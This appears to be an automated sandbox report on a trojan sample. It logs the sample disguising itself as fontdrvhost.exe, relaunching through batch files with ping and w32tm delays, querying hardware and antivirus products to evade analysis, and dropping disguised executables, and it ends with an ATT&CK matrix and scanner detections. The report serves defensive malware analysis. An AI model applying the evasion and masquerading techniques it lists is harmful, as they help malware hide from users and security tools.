                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Memory allocated: 1280000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Memory allocated: 1B0B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: C00000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1A840000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1190000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1B110000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1670000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1B180000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1550000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1AEF0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: E10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1AAB0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: F70000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1ACA0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1190000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1AB90000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1800000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1B4D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1360000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1ADF0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: A20000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1A750000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: B60000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1A620000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD3600 rdtsc 0_2_00007FFD9BBD3600
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\fvxnZIOH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\inpEUjnz.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\XsyMwKeS.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\mJblSiJK.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\dpYUmTzI.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\OgxpbmIn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\rudcNvNr.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\wsOrhbIJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\hsmnhNDB.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZtZwWUdP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ORiFVhtH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\CQeYyQPa.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\zzDSBAiP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ikDUDecv.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\WuogHSdp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\YOQFKOOU.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe TID: 6644 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7268 Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 5004 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7180 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7532 Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7396 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7880 Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7788 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 8124 Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 8012 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 3512 Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 2520 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 6092 Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 5728 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7320 Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7696 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 8048 Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7552 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 4628 Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7284 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 8080 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe File Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\Documents\desktop.ini
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\AppData
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\AppData\Local\Temp
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\Desktop\desktop.ini
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\AppData\Local
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD3600 rdtsc 0_2_00007FFD9BBD3600
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Memory allocated: page read and write | page guard
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Queries volume information: C:\Users\user\Desktop\ZT3pxe2Tb4.exe VolumeInformation
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF70000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000008.00000002.1745557106.000000001B0DC000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.1998188991.000000001B3E9000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000002.2653167450.000000001B950000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2103426522.0000000001896000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2494300205.000000001B141000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                        Stealing of Sensitive Information

                        Source: Yara match File source: 00000000.00000002.1651517514.0000000013466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: ZT3pxe2Tb4.exe PID: 4484, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: fontdrvhost.exe PID: 5496, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: fontdrvhost.exe PID: 6648, type: MEMORYSTR
                        Source: Yara match File source: ZT3pxe2Tb4.exe, type: SAMPLE
                        Source: Yara match File source: 0.0.ZT3pxe2Tb4.exe.9e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000000.00000000.1606720859.00000000009E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match File source: C:\Users\user\AppData\Local\fontdrvhost.exe, type: DROPPED

                        Remote Access Functionality

                        Source: Yara match File source: 00000000.00000002.1651517514.0000000013466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: ZT3pxe2Tb4.exe PID: 4484, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: fontdrvhost.exe PID: 5496, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: fontdrvhost.exe PID: 6648, type: MEMORYSTR
                        Source: Yara match File source: ZT3pxe2Tb4.exe, type: SAMPLE
                        Source: Yara match File source: 0.0.ZT3pxe2Tb4.exe.9e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000000.00000000.1606720859.00000000009E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match File source: C:\Users\user\AppData\Local\fontdrvhost.exe, type: DROPPED
                        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                        Gather Victim Identity Information | 1 Scripting | Valid Accounts | 241 Windows Management Instrumentation | 1 Scheduled Task/Job | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 251 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                        Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scripting | 1 Scheduled Task/Job | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                        Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 DLL Side-Loading | 151 Virtualization/Sandbox Evasion | Security Account Manager | 151 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Software Packing | DCSync | 34 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                        [Behavior graph] Behavior Graph ID: 1417387 Sample: ZT3pxe2Tb4.exe Startdate: 29/03/2024 Architecture: WINDOWS Score: 100

                        Source | Detection | Scanner | Label | Link
                        ZT3pxe2Tb4.exe | 87% | ReversingLabs | ByteCode-MSIL.Trojan.Zusy
                        ZT3pxe2Tb4.exe | 73% | Virustotal |  | Browse
                        ZT3pxe2Tb4.exe | 100% | Avira | HEUR/AGEN.1323342
                        ZT3pxe2Tb4.exe | 100% | Joe Sandbox ML
                        Source | Detection | Scanner | Label | Link
                        C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat | 100% | Avira | BAT/Runner.IK
                        C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat | 100% | Avira | BAT/Runner.IK
                        C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat | 100% | Avira | BAT/Runner.IL
                        C:\Users\user\Desktop\DACRVJoK.log | 100% | Avira | HEUR/AGEN.1362695
